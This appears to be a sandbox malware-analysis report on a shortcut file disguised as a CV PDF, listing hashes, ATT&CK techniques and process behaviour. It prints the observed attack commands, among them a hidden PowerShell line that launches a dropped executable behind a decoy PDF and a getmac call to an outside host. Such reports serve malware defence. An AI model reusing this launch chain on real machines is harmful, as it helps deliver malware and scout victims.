f761d87cea888c09206e10627d8de9da113ed934d0f4f88f9d25384df0afd015

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
09-07-2024 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CV_zheregelya.pdf.lnk
Size

1KB
MD5

0a533419e2601004585b16d46d3d212f
SHA1

b247eb947591cbd5569b64b6dcbbe32bc0d1f859
SHA256

232a0ab1ffe72a5e12aa881c2b2b5e04af662dd84d594f9ad0e3c26f1abe0337
SHA512

6b28c70f357cbd357cb81a12eccb66e2c54ff5e4f9f6026e9457f8361ef208e256f8fa784ebdb7167f21b20602510b87bed1c67449c179676fc869a20a6e67bc

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2356 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

2356 powershell.exe
2356 powershell.exe
2356 powershell.exe
2356 powershell.exe
2356 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2588 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2356 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

AcroRd32.exe

pid process

2588 AcroRd32.exe
2588 AcroRd32.exe
2588 AcroRd32.exe

pid	process
2356	powershell.exe

pid	process
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe

pid	process
2588	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2356	powershell.exe

pid	process
2588	AcroRd32.exe
2588	AcroRd32.exe
2588	AcroRd32.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

cmd.exepowershell.execv.exe

description	pid	process	target process
PID 2620 wrote to memory of 2356	2620	cmd.exe	powershell.exe
PID 2620 wrote to memory of 2356	2620	cmd.exe	powershell.exe
PID 2620 wrote to memory of 2356	2620	cmd.exe	powershell.exe
PID 2356 wrote to memory of 2676	2356	powershell.exe	cv.exe
PID 2356 wrote to memory of 2676	2356	powershell.exe	cv.exe
PID 2356 wrote to memory of 2676	2356	powershell.exe	cv.exe
PID 2356 wrote to memory of 2588	2356	powershell.exe	AcroRd32.exe
PID 2356 wrote to memory of 2588	2356	powershell.exe	AcroRd32.exe
PID 2356 wrote to memory of 2588	2356	powershell.exe	AcroRd32.exe
PID 2356 wrote to memory of 2588	2356	powershell.exe	AcroRd32.exe
PID 2676 wrote to memory of 2896	2676	cv.exe	getmac.exe
PID 2676 wrote to memory of 2896	2676	cv.exe	getmac.exe
PID 2676 wrote to memory of 2896	2676	cv.exe	getmac.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\CV_zheregelya.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noprofile -w 1 $l=gl;cd $l;start .\cv.exe;start .\CV_zheregelya.pdf
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356

C:\Users\Admin\AppData\Local\Temp\cv.exe
"C:\Users\Admin\AppData\Local\Temp\cv.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2676

\??\c:\windows\System32\getmac.exe
getmac /s service.1c-report.com /fo table /nh /v
4⤵
PID:2896

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\CV_zheregelya.pdf"
3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2588

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
Filesize
3KB

MD5
3fb06afd7d5b54a437d72d1b8a28f8ba

SHA1
d7ead4c7b70b777084f033275b57a92dd020a09f

SHA256
1cd293a0af93bc7ce7f011590cf8d43e667f556845a877becd719e09e62432cf

SHA512
42ae8dd0d79fb4802501ca46351c1f9b33890b2c4bc6c010399cb6a0b81a71ea780cdda63a7c857374ebb89b9591000a92f15170f6dc5e33da3b1d097fa32ff2

Download Submit
memory/2356-38-0x000007FEF649E000-0x000007FEF649F000-memory.dmp

Filesize
4KB

Download
memory/2356-39-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2356-40-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2356-41-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-43-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-42-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-45-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-44-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-46-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Filesize
9.6MB

Download